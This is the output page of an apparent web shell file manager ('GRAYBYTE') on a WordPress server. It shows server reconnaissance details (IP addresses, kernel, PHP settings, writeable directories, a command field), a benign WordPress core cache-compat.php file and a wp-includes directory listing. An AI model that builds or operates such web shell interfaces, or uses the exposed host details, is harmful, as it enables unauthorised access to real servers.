GRAYBYTE WORDPRESS FILE MANAGER2399

Server IP : 3.104.188.249 / Your IP : 216.73.217.141
System : Linux ip-172-26-1-242 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
PHP Version : 8.3.31
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : ON | Pkexec : OFF
Directory : /var/www/html/wp-includes/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /var/www/html/wp-includes//cache-compat.php
<?php
/**
 * Object Cache API functions missing from 3rd party object caches.
 *
 * @link https://developer.wordpress.org/reference/classes/wp_object_cache/
 *
 * @package WordPress
 * @subpackage Cache
 */

if ( ! function_exists( 'wp_cache_add_multiple' ) ) :
	/**
	 * Adds multiple values to the cache in one call, if the cache keys don't already exist.
	 *
	 * Compat function to mimic wp_cache_add_multiple().
	 *
	 * @ignore
	 * @since 6.0.0
	 *
	 * @see wp_cache_add_multiple()
	 *
	 * @param array  $data   Array of keys and values to be added.
	 * @param string $group  Optional. Where the cache contents are grouped. Default empty.
	 * @param int    $expire Optional. When to expire the cache contents, in seconds.
	 *                       Default 0 (no expiration).
	 * @return bool[] Array of return values, grouped by key. Each value is either
	 *                true on success, or false if cache key and group already exist.
	 */
	function wp_cache_add_multiple( array $data, $group = '', $expire = 0 ) {
		$values = array();

		foreach ( $data as $key => $value ) {
			$values[ $key ] = wp_cache_add( $key, $value, $group, $expire );
		}

		return $values;
	}
endif;

if ( ! function_exists( 'wp_cache_set_multiple' ) ) :
	/**
	 * Sets multiple values to the cache in one call.
	 *
	 * Differs from wp_cache_add_multiple() in that it will always write data.
	 *
	 * Compat function to mimic wp_cache_set_multiple().
	 *
	 * @ignore
	 * @since 6.0.0
	 *
	 * @see wp_cache_set_multiple()
	 *
	 * @param array  $data   Array of keys and values to be set.
	 * @param string $group  Optional. Where the cache contents are grouped. Default empty.
	 * @param int    $expire Optional. When to expire the cache contents, in seconds.
	 *                       Default 0 (no expiration).
	 * @return bool[] Array of return values, grouped by key. Each value is either
	 *                true on success, or false on failure.
	 */
	function wp_cache_set_multiple( array $data, $group = '', $expire = 0 ) {
		$values = array();

		foreach ( $data as $key => $value ) {
			$values[ $key ] = wp_cache_set( $key, $value, $group, $expire );
		}

		return $values;
	}
endif;

if ( ! function_exists( 'wp_cache_get_multiple' ) ) :
	/**
	 * Retrieves multiple values from the cache in one call.
	 *
	 * Compat function to mimic wp_cache_get_multiple().
	 *
	 * @ignore
	 * @since 5.5.0
	 *
	 * @see wp_cache_get_multiple()
	 *
	 * @param array  $keys  Array of keys under which the cache contents are stored.
	 * @param string $group Optional. Where the cache contents are grouped. Default empty.
	 * @param bool   $force Optional. Whether to force an update of the local cache
	 *                      from the persistent cache. Default false.
	 * @return array Array of return values, grouped by key. Each value is either
	 *               the cache contents on success, or false on failure.
	 */
	function wp_cache_get_multiple( $keys, $group = '', $force = false ) {
		$values = array();

		foreach ( $keys as $key ) {
			$values[ $key ] = wp_cache_get( $key, $group, $force );
		}

		return $values;
	}
endif;

if ( ! function_exists( 'wp_cache_delete_multiple' ) ) :
	/**
	 * Deletes multiple values from the cache in one call.
	 *
	 * Compat function to mimic wp_cache_delete_multiple().
	 *
	 * @ignore
	 * @since 6.0.0
	 *
	 * @see wp_cache_delete_multiple()
	 *
	 * @param array  $keys  Array of keys under which the cache to deleted.
	 * @param string $group Optional. Where the cache contents are grouped. Default empty.
	 * @return bool[] Array of return values, grouped by key. Each value is either
	 *                true on success, or false if the contents were not deleted.
	 */
	function wp_cache_delete_multiple( array $keys, $group = '' ) {
		$values = array();

		foreach ( $keys as $key ) {
			$values[ $key ] = wp_cache_delete( $key, $group );
		}

		return $values;
	}
endif;

if ( ! function_exists( 'wp_cache_flush_runtime' ) ) :
	/**
	 * Removes all cache items from the in-memory runtime cache.
	 *
	 * Compat function to mimic wp_cache_flush_runtime().
	 *
	 * @ignore
	 * @since 6.0.0
	 *
	 * @see wp_cache_flush_runtime()
	 *
	 * @return bool True on success, false on failure.
	 */
	function wp_cache_flush_runtime() {
		if ( ! wp_cache_supports( 'flush_runtime' ) ) {
			_doing_it_wrong(
				__FUNCTION__,
				__( 'Your object cache implementation does not support flushing the in-memory runtime cache.' ),
				'6.1.0'
			);

			return false;
		}

		return wp_cache_flush();
	}
endif;

if ( ! function_exists( 'wp_cache_flush_group' ) ) :
	/**
	 * Removes all cache items in a group, if the object cache implementation supports it.
	 *
	 * Before calling this function, always check for group flushing support using the
	 * `wp_cache_supports( 'flush_group' )` function.
	 *
	 * @since 6.1.0
	 *
	 * @see WP_Object_Cache::flush_group()
	 * @global WP_Object_Cache $wp_object_cache Object cache global instance.
	 *
	 * @param string $group Name of group to remove from cache.
	 * @return bool True if group was flushed, false otherwise.
	 */
	function wp_cache_flush_group( $group ) {
		global $wp_object_cache;

		if ( ! wp_cache_supports( 'flush_group' ) ) {
			_doing_it_wrong(
				__FUNCTION__,
				__( 'Your object cache implementation does not support flushing individual groups.' ),
				'6.1.0'
			);

			return false;
		}

		return $wp_object_cache->flush_group( $group );
	}
endif;

if ( ! function_exists( 'wp_cache_supports' ) ) :
	/**
	 * Determines whether the object cache implementation supports a particular feature.
	 *
	 * @since 6.1.0
	 *
	 * @param string $feature Name of the feature to check for. Possible values include:
	 *                        'add_multiple', 'set_multiple', 'get_multiple', 'delete_multiple',
	 *                        'flush_runtime', 'flush_group'.
	 * @return bool True if the feature is supported, false otherwise.
	 */
	function wp_cache_supports( $feature ) {
		return false;
	}
endif;

if ( ! function_exists( 'wp_cache_get_salted' ) ) :
	/**
	 * Retrieves cached data if valid and unchanged.
	 *
	 * @since 6.9.0
	 *
	 * @param string          $cache_key The cache key used for storage and retrieval.
	 * @param string          $group     The cache group used for organizing data.
	 * @param string|string[] $salt      The timestamp (or multiple timestamps if an array) indicating when the cache group(s) were last updated.
	 * @return mixed|false The cached data if valid, or false if the cache does not exist or is outdated.
	 */
	function wp_cache_get_salted( $cache_key, $group, $salt ) {
		$salt  = is_array( $salt ) ? implode( ':', $salt ) : $salt;
		$cache = wp_cache_get( $cache_key, $group );

		if ( ! is_array( $cache ) ) {
			return false;
		}

		if ( ! isset( $cache['salt'] ) || ! isset( $cache['data'] ) || $salt !== $cache['salt'] ) {
			return false;
		}

		return $cache['data'];
	}
endif;

if ( ! function_exists( 'wp_cache_set_salted' ) ) :
	/**
	 * Stores salted data in the cache.
	 *
	 * @since 6.9.0
	 *
	 * @param string          $cache_key The cache key under which to store the data.
	 * @param mixed           $data      The data to be cached.
	 * @param string          $group     The cache group to which the data belongs.
	 * @param string|string[] $salt      The timestamp (or multiple timestamps if an array) indicating when the cache group(s) were last updated.
	 * @param int             $expire    Optional. When to expire the cache contents, in seconds.
	 *                                   Default 0 (no expiration).
	 * @return bool True on success, false on failure.
	 */
	function wp_cache_set_salted( $cache_key, $data, $group, $salt, $expire = 0 ) {
		$salt = is_array( $salt ) ? implode( ':', $salt ) : $salt;
		return wp_cache_set(
			$cache_key,
			array(
				'data' => $data,
				'salt' => $salt,
			),
			$group,
			$expire
		);
	}
endif;

if ( ! function_exists( 'wp_cache_get_multiple_salted' ) ) :
	/**
	 * Retrieves multiple items from the cache, only considering valid and unchanged items.
	 *
	 * @since 6.9.0
	 *
	 * @param array           $cache_keys Array of cache keys to retrieve.
	 * @param string          $group      The group of the cache to check.
	 * @param string|string[] $salt       The timestamp (or multiple timestamps if an array) indicating when the cache group(s) were last updated.
	 * @return array An associative array containing cache values. Values are `false` if they are not found or outdated.
	 */
	function wp_cache_get_multiple_salted( $cache_keys, $group, $salt ) {
		$salt  = is_array( $salt ) ? implode( ':', $salt ) : $salt;
		$cache = wp_cache_get_multiple( $cache_keys, $group );

		foreach ( $cache as $key => $value ) {
			if ( ! is_array( $value ) ) {
				$cache[ $key ] = false;
				continue;
			}
			if ( ! isset( $value['salt'], $value['data'] ) || $salt !== $value['salt'] ) {
				$cache[ $key ] = false;
				continue;
			}
			$cache[ $key ] = $value['data'];
		}

		return $cache;
	}
endif;

if ( ! function_exists( 'wp_cache_set_multiple_salted' ) ) :
	/**
	 * Stores multiple pieces of salted data in the cache.
	 *
	 * @since 6.9.0
	 *
	 * @param mixed           $data   Data to be stored in the cache for all keys.
	 * @param string          $group  Group to which the cached data belongs.
	 * @param string|string[] $salt   The timestamp (or multiple timestamps if an array) indicating when the cache group(s) were last updated.
	 * @param int             $expire Optional. When to expire the cache contents, in seconds.
	 *                                Default 0 (no expiration).
	 * @return bool[] Array of return values, grouped by key. Each value is either
	 *                true on success, or false on failure.
	 */
	function wp_cache_set_multiple_salted( $data, $group, $salt, $expire = 0 ) {
		$salt      = is_array( $salt ) ? implode( ':', $salt ) : $salt;
		$new_cache = array();
		foreach ( $data as $key => $value ) {
			$new_cache[ $key ] = array(
				'data' => $value,
				'salt' => $salt,
			);
		}
		return wp_cache_set_multiple( $new_cache, $group, $expire );
	}
endif;

if ( ! function_exists( 'wp_cache_switch_to_blog' ) ) :
	/**
	 * Used when switch_to_blog() and restore_current_blog() are called, but
	 * only when a persistent object cache drop-in plugin has omitted the
	 * wp_cache_switch_to_blog() function that was introduced in 3.5.0.
	 *
	 * @link https://core.trac.wordpress.org/ticket/23290
	 *
	 * @since 7.0.0
	 *
	 * @global WP_Object_Cache $wp_object_cache Object cache global instance.
	 *
	 * @param int $blog_id Site ID.
	 */
	function wp_cache_switch_to_blog( $blog_id ): void {
		global $wp_object_cache;

		// Attempt to use the drop-in object cache method if it exists.
		if ( is_object( $wp_object_cache ) && method_exists( $wp_object_cache, 'switch_to_blog' ) ) {
			$wp_object_cache->switch_to_blog( $blog_id );
			return;
		}

		/*
		 * Perform a fallback blog switch, which will reinitialize the caches
		 * for the new blog ID.
		 */
		wp_cache_switch_to_blog_fallback();
	}
endif;

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 10 2026 19:40:36
www-data / www-data
2775
ID3
--
June 04 2026 19:23:20
www-data / www-data
2775
IXR
--
June 04 2026 19:23:20
www-data / www-data
2775
PHPMailer
--
June 04 2026 19:23:20
www-data / www-data
2775
Requests
--
June 04 2026 19:23:20
www-data / www-data
2775
SimplePie
--
June 04 2026 19:23:20
www-data / www-data
2775
Text
--
June 04 2026 19:23:20
www-data / www-data
2775
abilities-api
--
June 04 2026 19:23:20
www-data / www-data
2775
ai-client
--
June 04 2026 19:23:20
www-data / www-data
2775
assets
--
June 04 2026 19:23:20
www-data / www-data
2775
block-bindings
--
June 04 2026 19:23:20
www-data / www-data
2775
block-patterns
--
June 04 2026 19:23:20
www-data / www-data
2775
block-supports
--
June 04 2026 19:23:20
www-data / www-data
2775
blocks
--
June 04 2026 19:23:20
www-data / www-data
2775
build
--
June 04 2026 19:23:20
www-data / www-data
2775
certificates
--
June 04 2026 19:23:20
www-data / www-data
2775
collaboration
--
June 04 2026 19:23:20
www-data / www-data
2775
css
--
June 04 2026 19:23:20
www-data / www-data
2775
customize
--
June 04 2026 19:23:20
www-data / www-data
2775
fonts
--
June 04 2026 19:23:20
www-data / www-data
2775
html-api
--
June 04 2026 19:23:20
www-data / www-data
2775
images
--
June 04 2026 19:23:20
www-data / www-data
2775
interactivity-api
--
June 04 2026 19:23:20
www-data / www-data
2775
js
--
June 04 2026 19:23:20
www-data / www-data
2775
l10n
--
June 04 2026 19:23:20
www-data / www-data
2775
php-ai-client
--
June 04 2026 19:23:20
www-data / www-data
2775
php-compat
--
June 04 2026 19:23:20
www-data / www-data
2775
pomo
--
June 04 2026 19:23:20
www-data / www-data
2775
rest-api
--
June 04 2026 19:23:20
www-data / www-data
2775
sitemaps
--
June 04 2026 19:23:20
www-data / www-data
2775
sodium_compat
--
June 04 2026 19:23:20
www-data / www-data
2775
style-engine
--
June 04 2026 19:23:20
www-data / www-data
2775
theme-compat
--
June 04 2026 19:23:20
www-data / www-data
2775
widgets
--
June 04 2026 19:23:20
www-data / www-data
2775
.htaccess
0.124 KB
June 04 2026 19:23:20
www-data / www-data
0444
abilities-api.php
23.798 KB
May 27 2026 03:19:33
www-data / www-data
0664
abilities.php
7.821 KB
May 27 2026 03:19:33
www-data / www-data
0664
admin-bar.php
38.394 KB
June 04 2026 19:19:37
www-data / www-data
0664
ai-client.php
2.489 KB
May 27 2026 03:19:33
www-data / www-data
0664
atomlib.php
11.896 KB
May 27 2026 03:19:33
www-data / www-data
0664
author-template.php
19.379 KB
May 27 2026 03:19:33
www-data / www-data
0664
block-bindings.php
7.35 KB
May 27 2026 03:19:33
www-data / www-data
0664
block-editor.php
28.051 KB
May 27 2026 03:19:33
www-data / www-data
0664
block-i18n.json
0.309 KB
May 27 2026 03:19:33
www-data / www-data
0664
block-patterns.php
15.24 KB
May 27 2026 03:19:33
www-data / www-data
0664
block-template-utils.php
61.332 KB
May 27 2026 03:19:33
www-data / www-data
0664
block-template.php
17.833 KB
May 27 2026 03:19:33
www-data / www-data
0664
blocks.php
116.643 KB
May 27 2026 03:19:33
www-data / www-data
0664
bookmark-template.php
12.469 KB
May 27 2026 03:19:33
www-data / www-data
0664
bookmark.php
15.065 KB
May 27 2026 03:19:33
www-data / www-data
0664
cache-compat.php
10.763 KB
May 27 2026 03:19:33
www-data / www-data
0664
cache.php
13.17 KB
May 27 2026 03:19:33
www-data / www-data
0664
canonical.php
33.833 KB
May 27 2026 03:19:33
www-data / www-data
0664
capabilities.php
42.61 KB
May 27 2026 03:19:33
www-data / www-data
0664
category-template.php
55.649 KB
May 27 2026 03:19:33
www-data / www-data
0664
category.php
12.533 KB
June 04 2026 19:19:37
www-data / www-data
0664
class-IXR.php
2.555 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-avif-info.php
29.305 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-feed.php
0.526 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-http.php
0.358 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-json.php
42.652 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-oembed.php
0.392 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-phpass.php
6.612 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-phpmailer.php
0.648 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-pop3.php
20.626 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-requests.php
2.185 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-simplepie.php
0.442 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-smtp.php
0.446 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-snoopy.php
36.831 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-category-dropdown.php
2.411 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-category.php
8.278 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-comment.php
13.888 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-nav-menu.php
11.762 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-page-dropdown.php
2.646 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-walker-page.php
7.434 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-admin-bar.php
17.582 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-ajax-response.php
5.143 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-application-passwords.php
16.698 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-bindings-registry.php
8.069 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-bindings-source.php
2.922 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-editor-context.php
1.318 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-list.php
4.603 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-metadata-registry.php
11.568 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-parser-block.php
2.495 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-parser-frame.php
1.947 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-parser.php
11.25 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-pattern-categories-registry.php
4.28 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-patterns-registry.php
10.07 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-processor.php
68.319 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-styles-registry.php
6.269 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-supports.php
6.397 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-template.php
1.985 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-templates-registry.php
6.914 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-type-registry.php
4.912 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block-type.php
16.829 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-block.php
24.141 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-classic-to-block-menu-converter.php
3.932 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-comment-query.php
47.491 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-comment.php
9.151 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-connector-registry.php
14.071 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-customize-control.php
25.507 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-customize-manager.php
198.126 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-customize-nav-menus.php
56.609 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-customize-panel.php
10.459 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-customize-section.php
10.946 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-customize-setting.php
29.261 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-customize-widgets.php
70.893 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-date-query.php
35.127 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-dependencies.php
16.688 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-dependency.php
2.591 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-duotone.php
39.951 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-editor.php
70.535 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-embed.php
15.535 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-error.php
7.326 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-exception.php
0.247 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-fatal-error-handler.php
7.959 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-feed-cache-transient.php
3.227 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-feed-cache.php
0.946 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-hook.php
16.246 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-cookie.php
7.099 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-curl.php
12.95 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-encoding.php
6.532 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-ixr-client.php
3.434 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-proxy.php
5.84 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-requests-hooks.php
1.975 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-requests-response.php
4.144 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-response.php
2.907 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http-streams.php
16.371 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-http.php
40.672 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-icons-registry.php
7.673 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-image-editor-gd.php
20.22 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-image-editor-imagick.php
36.11 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-image-editor.php
17.01 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-list-util.php
7.269 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-locale-switcher.php
6.617 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-locale.php
16.453 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-matchesmapregex.php
1.785 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-meta-query.php
29.792 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-metadata-lazyloader.php
6.673 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-navigation-fallback.php
8.978 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-network-query.php
19.252 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-network.php
12.008 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-object-cache.php
17.113 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-oembed-controller.php
6.743 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-oembed.php
30.862 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-paused-extensions-storage.php
4.948 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-phpmailer.php
4.246 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-plugin-dependencies.php
24.592 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-post-type.php
29.953 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-post.php
6.331 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-query.php
159.503 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-recovery-mode-cookie-service.php
6.716 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-recovery-mode-email-service.php
10.904 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-recovery-mode-key-service.php
4.799 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-recovery-mode-link-service.php
3.44 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-recovery-mode.php
11.185 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-rewrite.php
62.2 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-role.php
2.464 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-roles.php
9.103 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-script-modules.php
39.647 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-scripts.php
35.927 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-session-tokens.php
7.147 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-simplepie-file.php
3.469 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-simplepie-sanitize-kses.php
1.865 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-site-query.php
30.744 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-site.php
7.284 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-speculation-rules.php
7.377 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-styles.php
13.043 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-tax-query.php
19.118 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-taxonomy.php
18.124 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-term-query.php
39.796 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-term.php
5.14 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-text-diff-renderer-inline.php
0.956 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-text-diff-renderer-table.php
18.488 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-textdomain-registry.php
10.235 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-theme-json-data.php
1.767 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-theme-json-resolver.php
34.855 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-theme-json-schema.php
7.194 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-theme-json.php
169.569 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-theme.php
64.22 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-token-map.php
27.947 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-url-pattern-prefixer.php
4.689 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-user-meta-session-tokens.php
2.885 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-user-query.php
43.068 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-user-request.php
2.251 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-user.php
22.477 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-walker.php
13.01 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-widget-factory.php
3.269 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-widget.php
17.985 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp-xmlrpc-server.php
209.98 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wp.php
25.753 KB
May 27 2026 03:19:33
www-data / www-data
0664
class-wpdb.php
115.857 KB
May 27 2026 03:19:33
www-data / www-data
0664
class.wp-dependencies.php
0.364 KB
May 27 2026 03:19:33
www-data / www-data
0664
class.wp-scripts.php
0.335 KB
May 27 2026 03:19:33
www-data / www-data
0664
class.wp-styles.php
0.33 KB
May 27 2026 03:19:33
www-data / www-data
0664
collaboration.php
2.107 KB
May 27 2026 03:19:33
www-data / www-data
0664
comment-template.php
100.792 KB
May 27 2026 03:19:33
www-data / www-data
0664
comment.php
130.942 KB
June 04 2026 19:19:37
www-data / www-data
0664
compat-utf8.php
19.096 KB
May 27 2026 03:19:33
www-data / www-data
0664
compat.php
15.687 KB
June 04 2026 19:19:37
www-data / www-data
0664
connectors.php
23.516 KB
May 27 2026 03:19:33
www-data / www-data
0664
cron.php
44.046 KB
June 04 2026 19:19:38
www-data / www-data
0664
date.php
0.391 KB
May 27 2026 03:19:33
www-data / www-data
0664
default-constants.php
11.099 KB
May 27 2026 03:19:33
www-data / www-data
0664
default-filters.php
36.54 KB
May 27 2026 03:19:33
www-data / www-data
0664
default-widgets.php
2.241 KB
May 27 2026 03:19:33
www-data / www-data
0664
deprecated.php
189.431 KB
May 27 2026 03:19:33
www-data / www-data
0664
embed-template.php
0.33 KB
May 27 2026 03:19:33
www-data / www-data
0664
embed.php
37.994 KB
May 27 2026 03:19:33
www-data / www-data
0664
error-protection.php
3.996 KB
May 27 2026 03:19:33
www-data / www-data
0664
feed-atom-comments.php
5.375 KB
May 27 2026 03:19:33
www-data / www-data
0664
feed-atom.php
3.048 KB
May 27 2026 03:19:33
www-data / www-data
0664
feed-rdf.php
2.605 KB
May 27 2026 03:19:33
www-data / www-data
0664
feed-rss.php
1.161 KB
May 27 2026 03:19:33
www-data / www-data
0664
feed-rss2-comments.php
4.039 KB
May 27 2026 03:19:33
www-data / www-data
0664
feed-rss2.php
3.71 KB
May 27 2026 03:19:33
www-data / www-data
0664
feed.php
24.599 KB
June 04 2026 19:19:37
www-data / www-data
0664
fonts.php
9.561 KB
June 04 2026 19:19:37
www-data / www-data
0664
formatting.php
346.377 KB
June 04 2026 19:19:37
www-data / www-data
0664
functions.php
283.626 KB
June 04 2026 19:19:38
www-data / www-data
0664
functions.wp-scripts.php
20.012 KB
May 27 2026 03:19:33
www-data / www-data
0664
functions.wp-styles.php
8.451 KB
May 27 2026 03:19:33
www-data / www-data
0664
general-template.php
170.924 KB
June 04 2026 19:19:38
www-data / www-data
0664
global-styles-and-settings.php
20.293 KB
May 27 2026 03:19:33
www-data / www-data
0664
http.php
26.616 KB
June 04 2026 19:19:37
www-data / www-data
0664
https-detection.php
5.72 KB
May 27 2026 03:19:33
www-data / www-data
0664
https-migration.php
4.63 KB
May 27 2026 03:19:33
www-data / www-data
0664
kses.php
80.645 KB
May 27 2026 03:19:33
www-data / www-data
0664
l10n.php
69.741 KB
June 04 2026 19:19:37
www-data / www-data
0664
link-template.php
156.394 KB
May 27 2026 03:19:33
www-data / www-data
0664
load.php
55.151 KB
June 04 2026 19:19:37
www-data / www-data
0664
locale.php
0.158 KB
May 27 2026 03:19:33
www-data / www-data
0664
media-template.php
61.792 KB
May 27 2026 03:19:33
www-data / www-data
0664
media.php
218.549 KB
June 04 2026 19:19:37
www-data / www-data
0664
meta.php
65.175 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-blogs.php
25.714 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-default-constants.php
4.806 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-default-filters.php
6.48 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-deprecated.php
21.24 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-files.php
2.79 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-functions.php
89.689 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-load.php
19.568 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-network.php
3.693 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-settings.php
4.105 KB
May 27 2026 03:19:33
www-data / www-data
0664
ms-site.php
40.751 KB
May 27 2026 03:19:33
www-data / www-data
0664
nav-menu-template.php
25.381 KB
May 27 2026 03:19:33
www-data / www-data
0664
nav-menu.php
43.231 KB
June 04 2026 19:19:37
www-data / www-data
0664
option.php
102.616 KB
May 27 2026 03:19:33
www-data / www-data
0664
pluggable-deprecated.php
6.176 KB
May 27 2026 03:19:33
www-data / www-data
0664
pluggable.php
124.568 KB
June 04 2026 19:19:37
